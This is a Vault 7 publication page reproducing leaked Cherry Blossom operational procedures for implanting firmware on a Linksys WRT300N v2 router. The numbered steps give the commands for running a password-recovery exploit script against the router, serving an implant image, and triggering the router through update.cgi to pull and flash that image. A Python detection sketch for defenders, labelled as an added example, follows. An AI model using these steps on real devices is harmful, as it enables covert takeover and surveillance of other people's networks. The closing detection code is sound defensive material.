Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

UNCLASSIFIED
Cherry Bomb Program Cherry Blossom FAT Procedures
persistent data is NOT erased. If a device has CB firmware 'A' on it, then
you upgrade to the manufacturer's original firmware, and then you upgrade
to CB firmware 'B', the persistent data will be erased.
OPERATIONAL PROCEDURES:

The operator must be extremely familiar with the following procedure. Ideally,
the operator will have practiced many times on a test device.

0. It is assumed that the laptop is wirelessly connected to the Linksys
   WRT300N v2 running original manufacturer's firmware 2.00.08. The operator
   must know:
   - The IP address of the Linksys WRT300N v2 (192.168.1.1 by default),
     referred to hereafter as <DEVICE IP>. This is usually the
     wireless client's default gateway.
   - The IP address of the wireless client, referred to hereafter as
     <WIRELESS CLIENT IP>. To get this address, from a cygwin shell run:
         ipconfig /all
1. Open a cygwin shell, cd to <HOME>/<PACKAGE>, and run:
       perl cisc0wn-2.00.08.pl <DEVICE IP>
   In about 15 seconds, the program should return the device's password.
   NOTE: the most common case of failure here is running the program against
   a device that is already running a CB firmware. See the
   "TROUBLESHOOTING AND DEVICE RECOVERY" section for how to get out of this
   situation.
2. From the same cygwin shell, run the following:
       ./update_server.exe 2313 <SQSH_FILE>
   Where <SQSH_FILE> is the .sqsh image to deploy to the device. NOTE that
   each <SQSH_FILE> has a corresponding flytrap.config.<SQSH_FILE> that shows
   its configuration. Be sure to specify the appropriate file.
   The update_server.exe program should report:
       Image Size: nnnnnnnn
       Waiting for client connection
3. Open a browser (IE) and go to the following URL:
       http://<DEVICE IP>/update.cgi?<WIRELESS CLIENT IP>+2313
   For example, if the <DEVICE IP> is 192.168.1.1, and the
   <WIRELESS CLIENT IP> is 192.168.1.100, go to:
       http://192.168.1.1/update.cgi?192.168.1.100+2313
   An authentication box should pop up (unless you have previously
   authenticated). Enter the password from step 1, and leave the username
   field blank.
4. The cygwin shell from step 2 should nearly immediately report:
       Connection Accepted
       bytesSent nnnnnnnn
       Sent nnnnnnnn bytes
   At this point the <SQSH_FILE> has been uploaded to the device's RAM, and
   writing to flash has begun. Note that at this point the operator can leave.
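
For defenders, the request in step 3 has a distinctive shape: update.cgi with a query of <IPv4>+<port>. The following detection sketch is an added example, not part of the original document; it scans HTTP log lines for that shape. The combined-log line format (as a proxy or network sensor might record it), the function name and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Access-log entry in combined-log style (assumed sensor/proxy format).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Query shape from step 3: update.cgi?<IPv4>+<port> ("+" may be sent as %2B).
PULL_RE = re.compile(
    r'/update\.cgi\?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?:\+|%2[Bb])(?P<port>\d{1,5})$')

# Constructed sample lines; addresses, times and status codes are illustrative only.
SAMPLE_LOG = [
    '192.168.1.100 - - [01/Jan/2024:10:00:01 +0000] "GET /index.htm HTTP/1.1" 200 512',
    '192.168.1.100 - - [01/Jan/2024:10:00:05 +0000] "GET /update.cgi?192.168.1.100+2313 HTTP/1.1" 401 0',
    '192.168.1.100 - - [01/Jan/2024:10:00:09 +0000] "GET /update.cgi?192.168.1.100+2313 HTTP/1.1" 200 0',
    '192.168.1.57 - - [01/Jan/2024:10:02:00 +0000] "GET /update.cgi?999.1.1.1+2313 HTTP/1.1" 404 0',
    '192.168.1.57 - - [01/Jan/2024:10:03:00 +0000] "GET /update.cgi?192.168.1.9%2B8080 HTTP/1.1" 200 0',
]

def find_firmware_pull_requests(lines):
    """Return one finding per request that asks the device to fetch an image from host:port."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        q = PULL_RE.search(m["target"]) if m else None
        if not q:
            continue
        try:
            server = ipaddress.ip_address(q["ip"])
        except ValueError:
            continue  # digits in dotted form but not a valid address
        port = int(q["port"])
        if not 0 < port < 65536:
            continue
        findings.append({
            "time": m["ts"], "client": m["client"],
            "image_server": str(server), "port": port,
            "status": int(m["status"]),
            # In the procedure the browsing host is also the image server.
            "self_hosted": m["client"] == str(server),
        })
    return findings

if __name__ == "__main__":
    for finding in find_firmware_pull_requests(SAMPLE_LOG):
        print(finding)
```
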